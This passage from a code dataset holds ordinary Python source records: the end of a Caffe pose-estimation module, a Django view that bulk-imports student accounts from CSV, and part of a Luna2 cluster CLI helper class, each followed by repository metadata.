image\n @param human: np.array - cropped human image\n @param config: dict - CPM settings\n @param model: pose estimator object\n @param c: np.array - human center\n @param s: int - human scale\n @param viz: bool - flag for joint visualization\n @return: np.array - joint coords\n \"\"\"\n caffe.set_mode_gpu()\n\n (ux, uy), (lx, ly) = human_bbox\n\n # # Get scale\n # scale = float(self.boxsize) / (np.max([np.abs(ux - lx), np.abs(uy - ly)]) + 50)\n #\n # # Get center\n # cx, cy = (int((ux + lx) * scale / 2), int((uy + ly) * scale / 2))\n #\n # im_human = crop_human(sample, (cx, cy), scale, self.boxsize)\n # # plt.figure(), plt.imshow(im_human), plt.show()\n\n # Get scale\n scale = float(self.boxsize) / sample.shape[0]\n # Get center\n cx, cy = (int((ux + lx) * scale / 2), int((uy + ly) * scale / 2))\n im_human = crop_human(sample, (cx, cy), scale, self.boxsize)\n # plt.figure(), plt.imshow(im_human), plt.show()\n\n self.im = im_human.copy()\n\n pose_map = self.estimate()\n\n joint_coords = []\n for joint_map in pose_map:\n joint_map_resized = map_resize(self.im.shape, joint_map)\n\n # Find joint heatmap maxima\n joint = [-1, -1]\n if joint_map_resized.max() >= self.confidence_th:\n joint = list(np.unravel_index(joint_map_resized.argmax(),\n joint_map_resized.shape))\n\n # Back to full coordinates\n joint[0] = (joint[0] - (self.boxsize / 2) + cy) / scale\n joint[1] = (joint[1] - (self.boxsize / 2) + cx) / scale\n\n joint_coords.append(joint)\n\n joint_coords = np.array([[int(x), int(y)] for y, x in joint_coords])\n\n if get_pose_maps:\n return joint_coords, pose_map\n else:\n return joint_coords\n\n\nif __name__ == \"__main__\":\n model_fname = [\"/home/dpascualhe/repos/2017-tfm-david-pascual/src/Estimator/Pose/models/caffe/pose_deploy_resize.prototxt\",\n \"/home/dpascualhe/repos/2017-tfm-david-pascual/src/Estimator/Pose/models/caffe/pose_iter_320000.caffemodel\"]\n sigma = 21\n\n boxsizes = [384, 192, 128, 92]\n\n from matplotlib import pyplot as plt\n plt.figure()\n\n for idx, boxsize in enumerate(boxsizes):\n pe = PoseCPM(model_fname, boxsize, sigma)\n\n im = cv2.imread(\"/home/dpascualhe/repos/2017-tfm-david-pascual/src/Estimator/Samples/nadal.png\")\n bbox = np.array([[237, -21], [597, 338]])\n joints, pose_maps = pe.get_coords(im, bbox, get_pose_maps=True)\n print(pose_maps.shape)\n\n # plt.figure()\n # plt.subplot(441), plt.imshow(pe.im[:, :, ::-1])\n # for idx in range(pose_maps.shape[0]):\n # plt.subplot(4, 4, idx + 2), plt.imshow(pose_maps[idx])\n # plt.show()\n\n limbs = [1, 2, 3, 4, 4, 5, 6, 7, 7, 8, 9, 10, 10, 11, 12, 13, 13, 14]\n limbs = np.array(limbs).reshape((-1, 2)) - 1\n\n colors = [[0, 0, 255], [0, 170, 255], [0, 255, 170], [0, 255, 0],\n [170, 255, 0], [255, 170, 0], [255, 0, 0], [255, 0, 170],\n [170, 0, 255]]\n\n\n def draw_estimation(im, bbox, joints, limbs, colors, stickwidth=6):\n upper, lower = bbox\n cv2.rectangle(im, tuple(upper), tuple(lower), (0, 255, 0), 3)\n\n for i, (p, q) in enumerate(limbs):\n px, py = joints[p]\n qx, qy = joints[q]\n\n if px >= 0 and py >= 0 and qx >= 0 and qy >= 0:\n m_x = int(np.mean(np.array([px, qx])))\n m_y = int(np.mean(np.array([py, qy])))\n\n length = ((px - qx) ** 2. + (py - qy) ** 2.) ** 0.5\n angle = math.degrees(math.atan2(py - qy, px - qx))\n polygon = cv2.ellipse2Poly((m_x, m_y),\n (int(length / 2), stickwidth),\n int(angle), 0, 360, 1)\n cv2.fillConvexPoly(im, polygon, colors[i])\n\n if px >= 0 and py >= 0:\n cv2.circle(im, (px, py), 3, (0, 0, 0), -1)\n if qx >= 0 and qy >= 0:\n cv2.circle(im, (qx, qy), 3, (0, 0, 0), -1)\n\n return im\n\n im_drawn = draw_estimation(im, bbox, joints, limbs, colors)\n plt.subplot(2, 2, idx + 1), plt.title(\"Boxsize = %dpx\" % boxsize), plt.imshow(im_drawn[:, :, ::-1])\n plt.show()\n\n", "repo_name": "RoboticsLabURJC/2017-tfm-david-pascual", "sub_path": "src/Estimator/Pose/pose_cpm.py", "file_name": "pose_cpm.py", "file_ext": "py", "file_size_in_byte": 9334, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 15, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.vstack", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 56, "usage_type": "attribute"}, {"api_name": "numpy.vstack", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.hstack", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 70, "usage_type": "attribute"}, {"api_name": "numpy.hstack", "line_number": 71, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 82, "usage_type": "call"}, {"api_name": "cv2.INTER_CUBIC", "line_number": 83, "usage_type": "attribute"}, {"api_name": "pose.PoseEstimator", "line_number": 88, "usage_type": "name"}, {"api_name": "pose.PoseEstimator.__init__", "line_number": 95, "usage_type": "call"}, {"api_name": "pose.PoseEstimator", "line_number": 95, "usage_type": "name"}, {"api_name": "caffe.set_mode_gpu", "line_number": 101, "usage_type": "call"}, {"api_name": "caffe.Net", "line_number": 102, "usage_type": "call"}, {"api_name": "caffe.TEST", "line_number": 102, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 120, "usage_type": "attribute"}, {"api_name": "numpy.squeeze", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 137, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 145, "usage_type": "call"}, {"api_name": "caffe.set_mode_gpu", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.unravel_index", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 215, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 215, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 232, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 241, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 248, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 248, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 249, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 249, "usage_type": "call"}, {"api_name": "math.degrees", "line_number": 252, "usage_type": "call"}, {"api_name": "math.atan2", "line_number": 252, "usage_type": "call"}, {"api_name": "cv2.ellipse2Poly", "line_number": 253, "usage_type": "call"}, {"api_name": "cv2.fillConvexPoly", "line_number": 256, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 259, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 261, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 266, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 266, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 266, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 266, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 267, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 267, "usage_type": "name"}]}
+{"seq_id": "23137312673", "text": "import logging\nimport string\nfrom datetime import datetime\nimport random\n\nimport pandas as pd\nfrom django.contrib.auth import get_user_model\nfrom django.utils.text import slugify\n\nfrom rest_framework import permissions\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import ModelViewSet\n\nfrom members.models import PersonalProfile\nfrom students.models import Student\nfrom students.serializers import StudentSerializer\n\nUser = get_user_model()\n\n\ndef generate_random_password():\n chars = string.ascii_letters + string.digits + string.punctuation\n return ''.join((random.choice(chars)) for x in range(20))\n\n\ndef process_students_data_file(full_file_path):\n logging.info(msg='Reading inputs')\n student_data = pd.read_csv(full_file_path)\n for row_index in student_data.index:\n reg_no = student_data['reg_no'][row_index]\n birth_date = student_data['birth_date'][row_index]\n birth_date = datetime.strptime(birth_date, '%d/%m/%Y').date()\n first_name = student_data['first_name'][row_index]\n middle_name = student_data['middle_name'][row_index]\n last_name = student_data['last_name'][row_index]\n degree = student_data['degree'][row_index]\n department = student_data['department'][row_index]\n reg_year = int(student_data['reg_year'][row_index])\n pass_year = int(student_data['grad_year'][row_index])\n gender = student_data['gender'][row_index]\n email = student_data['email'][row_index]\n email = str(email).lower().replace(' ', '')\n contact = student_data['contact'][row_index]\n student_info = {\n 'reg_no': reg_no,\n 'birth_date': birth_date,\n 'first_name': first_name,\n 'middle_name': middle_name,\n 'last_name': last_name,\n 'degree': degree.lower().replace(' ', ''),\n 'department': department,\n 'reg_year': reg_year,\n 'pass_year': pass_year,\n 'gender': gender[0]\n }\n logging.info(msg=f'Processing {student_info} with {email} and {contact}')\n try:\n student = Student.objects.create(**student_info)\n if email:\n username = slugify(email)\n user_info = {\n 'username': username,\n 'email': email,\n 'name': f'{first_name} {last_name}',\n }\n user = User.objects.create_user(username=username,\n email=email,\n password=generate_random_password())\n user.name = f'{first_name} {last_name}'\n try:\n user.save()\n member_info = {\n 'user': user,\n 'first_name': first_name,\n 'middle_name': middle_name,\n 'last_name': last_name,\n 'gender': gender[0],\n 'student': student,\n 'birth_date': student.birth_date,\n 'phone': contact\n }\n try:\n member = PersonalProfile.objects.create(**member_info)\n except Exception as ex:\n logging.error(msg=f'{member_info}', extra=ex)\n except Exception as ex:\n logging.error(msg=f'{user_info}', extra=ex)\n except Exception as ex:\n logging.error(msg=f'{student_info}', extra=ex)\n\n\nclass StudentViewSet(ModelViewSet):\n queryset = Student.objects.all()\n serializer_class = StudentSerializer\n permission_classes = (IsAuthenticated,)\n\n\nclass BatchUploadStudentsView(GenericAPIView):\n permission_classes = (permissions.IsAuthenticated, permissions.IsAdminUser,)\n\n def put(self, request, *args, **kwargs):\n students_data_file = request.FILES.get('file')\n with students_data_file.file as csv_file:\n process_students_data_file(csv_file)\n return Response(status=204)\n", "repo_name": "harshalgalgale/alumni-api", "sub_path": "students/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4222, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.contrib.auth.get_user_model", "line_number": 20, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 24, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 24, "usage_type": "attribute"}, {"api_name": "string.punctuation", "line_number": 24, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 25, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 29, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 34, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 34, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 58, "usage_type": "call"}, {"api_name": "students.models.Student.objects.create", "line_number": 60, "usage_type": "call"}, {"api_name": "students.models.Student.objects", "line_number": 60, "usage_type": "attribute"}, {"api_name": "students.models.Student", "line_number": 60, "usage_type": "name"}, {"api_name": "django.utils.text.slugify", "line_number": 62, "usage_type": "call"}, {"api_name": "members.models.PersonalProfile.objects.create", "line_number": 85, "usage_type": "call"}, {"api_name": "members.models.PersonalProfile.objects", "line_number": 85, "usage_type": "attribute"}, {"api_name": "members.models.PersonalProfile", "line_number": 85, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 87, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 89, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 91, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 94, "usage_type": "name"}, {"api_name": "students.models.Student.objects.all", "line_number": 95, "usage_type": "call"}, {"api_name": "students.models.Student.objects", "line_number": 95, "usage_type": "attribute"}, {"api_name": "students.models.Student", "line_number": 95, "usage_type": "name"}, {"api_name": "students.serializers.StudentSerializer", "line_number": 96, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 97, "usage_type": "name"}, {"api_name": "rest_framework.generics.GenericAPIView", "line_number": 100, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 101, "usage_type": "attribute"}, {"api_name": "rest_framework.permissions", "line_number": 101, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAdminUser", "line_number": 101, "usage_type": "attribute"}, {"api_name": "rest_framework.response.Response", "line_number": 107, "usage_type": "call"}]}
+{"seq_id": "41493983062", "text": "__author__ = \"Sumit Sharma\"\n__copyright__ = \"Copyright 2022, Luna2 Project [CLI]\"\n__license__ = \"GPL\"\n__version__ = \"2.0\"\n__maintainer__ = \"Sumit Sharma\"\n__email__ = \"sumit.sharma@clustervision.com\"\n__status__ = \"Development\"\n\nimport os\nfrom time import time, sleep\nimport base64\nimport binascii\nimport subprocess\nfrom random import randint\nfrom os import getpid\nfrom multiprocessing import Process\nfrom copy import deepcopy\nimport hostlist\nfrom termcolor import colored\nfrom nested_lookup import nested_lookup, nested_update, nested_delete, nested_alter\nfrom luna.utils.rest import Rest\nfrom luna.utils.log import Log\nfrom luna.utils.presenter import Presenter\nfrom luna.utils.constant import EDITOR_KEYS, BOOL_KEYS, filter_columns, sortby\nfrom luna.utils.message import Message\n\n\nclass Helper():\n \"\"\"\n All kind of helper methods.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Constructor - As of now, nothing have to initialize.\n \"\"\"\n self.logger = Log.get_logger()\n\n\n def choice_to_bool(self, raw_data=None):\n \"\"\"\n This method will convert string choices to\n boolean\n \"\"\"\n for key in BOOL_KEYS:\n content = nested_lookup(key, raw_data)\n if content:\n if content[0] is not None:\n if content[0] == '':\n raw_data = nested_update(raw_data, key=key, value='')\n elif content[0].lower() in ['y', 'yes', 'true']:\n raw_data = nested_update(raw_data, key=key, value=True)\n else:\n raw_data = nested_update(raw_data, key=key, value=False)\n return raw_data\n\n\n def prepare_payload(self, table=None, raw_data=None):\n \"\"\"\n This method will prepare the payload.\n \"\"\"\n raw_data = self.choice_to_bool(raw_data)\n payload = {k: v for k, v in raw_data.items() if v is not None}\n for key in EDITOR_KEYS:\n content = nested_lookup(key, payload)\n if content:\n if content[0] is True:\n if table:\n get_list = Rest().get_data(table, payload['name'])\n if get_list.status_code == 200:\n get_list = get_list.content\n else:\n Message().error_exit(get_list.content, get_list.status_code)\n if get_list:\n value = nested_lookup(key, get_list)\n if value:\n content = self.open_editor(key, value[0], payload)\n payload = nested_update(payload, key=key, value=content)\n else:\n content = self.open_editor(key, None, payload)\n payload = nested_update(payload, key=key, value=content)\n elif content[0] is False:\n payload = nested_delete(payload, key)\n elif content[0]:\n if os.path.exists(content[0]):\n if os.path.isfile(content[0]):\n with open(content[0], 'rb') as file_data:\n content = self.base64_encode(file_data.read())\n payload = nested_update(payload, key=key, value=content)\n else:\n Message().error_exit(f'ERROR :: {content[0]} is a Invalid filepath.')\n else:\n content = self.base64_encode(bytes(content[0], 'utf-8'))\n payload = nested_update(payload, key=key, value=content)\n return payload\n\n\n def open_editor(self, key=None, value=None, payload=None):\n \"\"\"\n This Method will open a default text editor to\n write the multiline text for keys such as comment,\n prescript, postscript, partscript, content etc. but\n not limited to them only.\n \"\"\"\n response = ''\n editor = str(os.path.abspath(__file__)).replace('helper.py', 'editor.sh')\n os.chmod(editor, 0o0755)\n random_path = str(time())+str(randint(1001,9999))+str(getpid())\n tmp_folder = f'/tmp/lunatmp-{random_path}'\n os.mkdir(tmp_folder)\n if key == 'content':\n filename = f'/tmp/lunatmp-{random_path}/{payload[\"name\"]}{key}'\n else:\n filename = f'/tmp/lunatmp-{random_path}/{key}'\n temp_file = open(filename, \"x\", encoding='utf-8')\n if value:\n value = self.base64_decode(value)\n temp_file.write(value)\n temp_file.close()\n subprocess.check_output(f\"sed -i 's/\\r$//' {editor}\", shell=True)\n subprocess.call([editor, filename])\n with open(filename, 'rb') as file_data:\n response = self.base64_encode(file_data.read())\n os.remove(filename)\n os.rmdir(tmp_folder)\n return response\n\n\n def get_list(self, table=None, args=None):\n \"\"\"\n Method to list all switches from Luna Configuration.\n \"\"\"\n response = False\n fields, rows = [], []\n get_list = Rest().get_data(table)\n if get_list.status_code == 200:\n get_list = get_list.content\n else:\n Message().error_exit(get_list.content, get_list.status_code)\n self.logger.debug(f'Get List Data from Helper => {get_list}')\n if get_list:\n data = get_list['config'][table]\n if args['raw']:\n json_data = Helper().prepare_json(data)\n # print(json_data)\n response = Presenter().show_json(json_data)\n else:\n data = Helper().prepare_json(data, True)\n fields, rows = self.filter_data(table, data)\n # fields = list(map(lambda x: x.replace('tpm_uuid', 'tpm_present'), fields))\n # fields = list(map(lambda x: x.replace('ns_ip', 'nameserver'), fields))\n self.logger.debug(f'Fields => {fields}')\n self.logger.debug(f'Rows => {rows}')\n title = f' << {table.capitalize()} >>'\n response = Presenter().show_table(title, fields, rows)\n else:\n response = Message().show_error(f'{table} is not found.')\n return response\n\n\n def show_data(self, table=None, args=None):\n \"\"\"\n Method to show a switch in Luna Configuration.\n \"\"\"\n row_name = None\n if 'name' in args:\n row_name = args['name']\n get_list = Rest().get_data(table, row_name)\n if get_list.status_code == 200:\n get_list = get_list.content\n else:\n Message().error_exit(get_list.content, get_list.status_code)\n self.logger.debug(f'Get List Data from Helper => {get_list}')\n if get_list:\n if row_name:\n data = get_list['config'][table][row_name]\n else:\n data = get_list['config'][table]\n json_data = Helper().prepare_json(data)\n if args['raw']:\n response = Presenter().show_json(json_data)\n else:\n data = Helper().prepare_json(data, True)\n fields, rows = self.filter_data_col(table, data)\n self.logger.debug(f'Fields => {fields}')\n self.logger.debug(f'Rows => {rows}')\n title = f'{table.capitalize()} => {data[\"name\"]}'\n response = Presenter().show_table_col(title, fields, rows)\n else:\n response = Message().show_error(f'{args[\"name\"]} is not found in {table}.')\n return response\n\n\n def member_record(self, table=None, args=None):\n \"\"\"\n This method fetch the nodes to the provided entity.\n \"\"\"\n response = False\n get_list = Rest().get_data(table, args['name']+'/_member')\n if get_list.status_code == 200:\n get_list = get_list.content\n else:\n Message().error_exit(get_list.content, get_list.status_code)\n self.logger.debug(f'Get List Data from Helper => {get_list}')\n if get_list:\n data = get_list['config'][table][args[\"name\"]]['members']\n data = Helper().prepare_json(data)\n if args['raw']:\n response = Presenter().show_json(data)\n else:\n num = 1\n fields = ['#', 'Nodes']\n rows = []\n for member in data:\n new_row = [num, member]\n rows.append(new_row)\n num = num + 1\n title = f'<< {table.capitalize()} {args[\"name\"]} Member Nodes >>'\n response = Presenter().show_table(title, fields, rows)\n else:\n response = Message().show_error(f'{table} {args[\"name\"]} not have any node.')\n return response\n\n\n def reserved_ip(self, args=None):\n \"\"\"\n This method will fetch all the reserved IP Address for a network.\n \"\"\"\n response = False\n get_list = Rest().get_data('network', args['name']+'/_member')\n if get_list.status_code == 200:\n get_list = get_list.content\n else:\n Message().error_exit(get_list.content, get_list.status_code)\n self.logger.debug(f'Get List Data from Helper => {get_list}')\n if get_list:\n data = get_list['config']['network'][args[\"name\"]]['taken']\n data = Helper().prepare_json(data)\n if args['raw']:\n response = Presenter().show_json(data)\n else:\n num = 1\n fields = ['#', 'IP Address', 'Device Name']\n rows = []\n for each in data:\n new_row = [num, each['ipaddress'], each['device']]\n rows.append(new_row)\n num = num + 1\n title = f'<< Reserved IP Addresses for Network {args[\"name\"]} >>'\n response = Presenter().show_table(title, fields, rows)\n else:\n response = Message().show_error(f'Network {args[\"name\"]} not have any IP reserved.')\n return response\n\n\n def add_record(self, table=None, data=None):\n \"\"\"\n This method will add a new record.\n \"\"\"\n for remove in ['verbose', 'command', 'action']:\n data.pop(remove, None)\n payload = self.prepare_payload(None, data)\n request_data = {'config':{table:{payload['name']: payload}}}\n self.logger.debug(f'Payload => {request_data}')\n record = Rest().get_data(table, payload['name'])\n if record.status_code == 200:\n message = f'{payload[\"name\"]} already present in {table.capitalize()}'\n Message().error_exit(message, record.status_code)\n else:\n response = Rest().post_data(table, payload['name'], request_data)\n self.logger.debug(f'Response => {response}')\n if response.status_code == 201:\n Message().show_success(response.content)\n else:\n Message().error_exit(response.content, response.status_code)\n return True\n\n\n def update_record(self, table=None, data=None):\n \"\"\"\n This method will update a record.\n \"\"\"\n for remove in ['verbose', 'command', 'action']:\n data.pop(remove, None)\n if 'raw' in data:\n data.pop('raw', None)\n payload = self.prepare_payload(table, data)\n name = None\n if 'name' in payload:\n name = payload['name']\n request_data = {'config':{table:{name: payload}}}\n else:\n request_data = {'config':{table: payload}}\n if 'cluster' in table:\n request_data = {'config':{table: payload}}\n self.logger.debug(f'Payload => {request_data}')\n if 'cluster' in table:\n response = Rest().post_data(table, None, request_data)\n else:\n record = Rest().get_data(table, payload['name'])\n if record.status_code == 200:\n if len(payload) == 1:\n Message().error_exit('Kindly choose something to update.')\n else:\n response = Rest().post_data(table, name, request_data)\n else:\n Message().error_exit(f'Kindly add the {payload[\"name\"]} first', record.status_code)\n self.logger.debug(f'Response => {response}')\n if response.status_code == 204:\n if name:\n Message().show_success(f'{table.capitalize()} {name} is updated.')\n else:\n Message().show_success(f'{table.capitalize()} is updated.')\n else:\n Message().error_exit(response.content, response.status_code)\n return True\n\n\n def delete_record(self, table=None, data=None):\n \"\"\"\n This method will delete a record.\n \"\"\"\n for remove in ['verbose', 'command', 'action']:\n data.pop(remove, None)\n self.logger.debug(f'Payload => {data}')\n response = Rest().get_delete(table, data['name'])\n self.logger.debug(f'Response => {response}')\n if response.status_code == 204:\n Message().show_success(f'{table.capitalize()} {data[\"name\"]} is removed.')\n else:\n Message().error_exit(response.content, response.status_code)\n return True\n\n\n def rename_record(self, table=None, data=None, newname=None):\n \"\"\"\n This method will rename a record.\n \"\"\"\n for remove in ['verbose', 'command', 'action']:\n data.pop(remove, None)\n request_data = {'config':{table:{data['name']: data}}}\n self.logger.debug(f'Payload => {request_data}')\n response = Rest().post_data(table, data['name'], request_data)\n self.logger.debug(f'Response => {response}')\n if response.status_code == 204:\n Message().show_success(f'{table.capitalize()} {data[\"name\"]} is renamed to {newname}.')\n else:\n Message().error_exit(response.content, response.status_code)\n return True\n\n\n def clone_record(self, table=None, data=None):\n \"\"\"\n This method will clone a record.\n \"\"\"\n for remove in ['verbose', 'command', 'action']:\n data.pop(remove, None)\n payload = self.prepare_payload(table, data)\n request_data = {'config':{table:{payload['name']: payload}}}\n self.logger.debug(f'Payload => {request_data}')\n response = Rest().post_clone(table, payload['name'], request_data)\n self.logger.debug(f'Response => {response}')\n if response.status_code == 201:\n Message().show_success(response.content)\n else:\n Message().error_exit(response.content, response.status_code)\n return True\n\n\n def grab_osimage(self, table=None, data=None):\n \"\"\"\n Method to grab an osimage for a node.\n \"\"\"\n process1 = Process(target=Helper().loader, args=(\"OS Image Grabbing...\",))\n process1.start()\n response = False\n for remove in ['verbose', 'command', 'action']:\n data.pop(remove, None)\n uri = f'config/{table}/{data[\"name\"]}/_osgrab'\n data = self.prepare_payload(table, data)\n request_data = {'config':{table:{data['name']: data}}}\n self.logger.debug(f'Payload => {data}')\n http_response = Rest().post_raw(uri, request_data)\n result = http_response\n if http_response.status_code == 200:\n http_response = http_response.json()\n if 'request_id' in http_response.keys():\n uri = f'config/status/{http_response[\"request_id\"]}'\n def dig_grabbing_status(uri):\n result = Rest().get_raw(uri)\n if result.status_code == 404:\n process1.terminate()\n return True\n elif result.status_code == 200:\n http_response = result.json()\n if http_response['message']:\n message = http_response['message'].split(';;')\n for msg in message:\n sleep(2)\n Message().show_success(f'{msg}')\n sleep(2)\n return dig_grabbing_status(uri)\n else:\n return False\n response = dig_grabbing_status(uri)\n if response:\n Message().show_success(f'[========] OS Image Grabbed for node {data[\"name\"]}.')\n else:\n Message().error_exit(result.content, result.status_code)\n return True\n\n\n def push_osimage(self, table=None, data=None):\n \"\"\"\n Method to push an osimage for a node or a group.\n \"\"\"\n process1 = Process(target=Helper().loader, args=(\"OS Image Pushing...\",))\n process1.start()\n response = False\n for remove in ['verbose', 'command', 'action']:\n data.pop(remove, None)\n uri = f'config/{table}/{data[\"name\"]}/_ospush'\n data = self.prepare_payload(table, data)\n request_data = {'config':{table:{data['name']: data}}}\n self.logger.debug(f'Payload => {data}')\n http_response = Rest().post_raw(uri, request_data)\n result = http_response\n if http_response.status_code == 200:\n http_response = http_response.json()\n if 'request_id' in http_response.keys():\n uri = f'config/status/{http_response[\"request_id\"]}'\n def dig_push_status(uri):\n result = Rest().get_raw(uri)\n if result.status_code == 404:\n process1.terminate()\n return True\n elif result.status_code == 200:\n http_response = result.json()\n if http_response['message']:\n message = http_response['message'].split(';;')\n for msg in message:\n sleep(2)\n Message().show_success(f'{msg}')\n sleep(2)\n return dig_push_status(uri)\n else:\n return False\n response = dig_push_status(uri)\n if response:\n Message().show_success(f'[========] OS Image Pushed for {table} {data[\"name\"]}.')\n else:\n Message().error_exit(result.content, result.status_code)\n return True\n\n\n def get_hostlist(self, raw_hosts=None):\n \"\"\"\n This method will perform power option on node.\n \"\"\"\n response = []\n self.logger.debug(f'Received hostlist: {raw_hosts}.')\n try:\n response = hostlist.expand_hostlist(raw_hosts)\n self.logger.debug(f'Expanded hostlist: {response}.')\n except hostlist.BadHostlist:\n self.logger.debug(f'Hostlist is incorrect: {raw_hosts}.')\n return response\n\n\n def common_list_args(self, parser=None):\n \"\"\"\n This method will provide the common list and show arguments..\n \"\"\"\n parser.add_argument('-v', '--verbose', action='store_true', help='Verbose Mode')\n parser.add_argument('-R', '--raw', action='store_true', help='Raw JSON output')\n return parser\n\n\n def loader(self, message=None):\n \"\"\"\n This method is a loader, will run while transactions happens.\n \"\"\"\n animation = [\n f\"[= ] {message}\",\n f\"[=== ] {message}\",\n f\"[==== ] {message}\",\n f\"[===== ] {message}\",\n f\"[====== ] {message}\",\n f\"[======= ] {message}\",\n f\"[========] {message}\",\n f\"[ =======] {message}\",\n f\"[ ======] {message}\",\n f\"[ =====] {message}\",\n f\"[ ====] {message}\",\n f\"[ ===] {message}\",\n f\"[ ==] {message}\",\n f\"[ =] {message}\",\n f\"[ ] {message}\",\n f\"[ ] {message}\", ]\n not_complete = True\n i = 0\n try:\n while not_complete:\n print(animation[i % len(animation)], end='\\r')\n sleep(.1)\n i += 1\n except KeyboardInterrupt:\n return False\n return True\n\n\n def control_print(self, system=None, content=None, count=None):\n \"\"\"\n This method will parse the data for Control API's.\n \"\"\"\n result = {}\n possible_cases = ['ok', 'on', 'off']\n if 'failed' in content['control']:\n for key, value in content['control']['failed'].items():\n result[key] = value\n\n if system in content['control']:\n for case in possible_cases:\n if case in content['control'][system]:\n for key, value in content['control'][system][case].items():\n result[key] = case.upper()\n result = dict(sorted(result.items()))\n\n header = \"| # | Node Name | \"\n header += \"Status |\"\n hr_line = 'X--------------------------------------------'\n hr_line += '--------------------------------------------X'\n rows = []\n for key, value in result.items():\n rows.append([count, key, value])\n count = count + 1\n\n if rows:\n for row in rows:\n if row[0] == 1:\n Message().show_success(hr_line)\n Message().show_success(header)\n Message().show_success(hr_line)\n row[0] = f'{row[0]}'.ljust(6)\n row[1] = f'{row[1]}'.ljust(19)\n row[2] = f'{row[2]}'.ljust(58)\n line = f'| {row[0]}| {row[1]}| {row[2]}|'\n Message().show_success(line)\n return count\n\n\n def dig_control_status(self, request_id=None, count=None, system=None):\n \"\"\"\n This method will fetch the status of Control API.\n \"\"\"\n uri = f'control/status/{request_id}'\n sleep(2)\n status = Rest().get_raw(uri)\n status_json = status.json()\n if status.status_code == 200:\n count = Helper().control_print(system, status_json, count)\n return self.dig_control_status(request_id, count, system)\n elif status.status_code == 404:\n hr_line = 'X--------------------------------------------'\n hr_line += '--------------------------------------------X'\n Message().show_success(hr_line)\n else:\n Message().show_error(f\"Something Went Wrong {status.status_code}\")\n\n\n def filter_interface(self, table=None, data=None):\n \"\"\"\n This method will generate the data as for\n row format from the interface\n \"\"\"\n self.logger.debug(f'table => {table}')\n self.logger.debug(f'data => {data}')\n fields, rows, colored_fields = [], [], []\n fields = filter_columns(table)\n self.logger.debug(f'fields => {fields}')\n for field_key in fields:\n val_row = []\n for ele in data:\n if field_key in list(ele.keys()):\n if ele[field_key] == 'in progress':\n val_row.append(colored('in progress', 'green'))\n elif ele[field_key] == 'queued':\n val_row.append(colored('queued', 'yellow'))\n elif ele[field_key] == 1:\n val_row.append(colored('yes', 'green'))\n elif ele[field_key] == 0:\n val_row.append(colored('no', 'yellow'))\n elif ele[field_key] == 'maintask':\n val_row.append(colored('Main Task', 'blue'))\n elif ele[field_key] == 'subtask':\n val_row.append(colored('Sub Task', 'magenta'))\n else:\n val_row.append(ele[field_key])\n else:\n 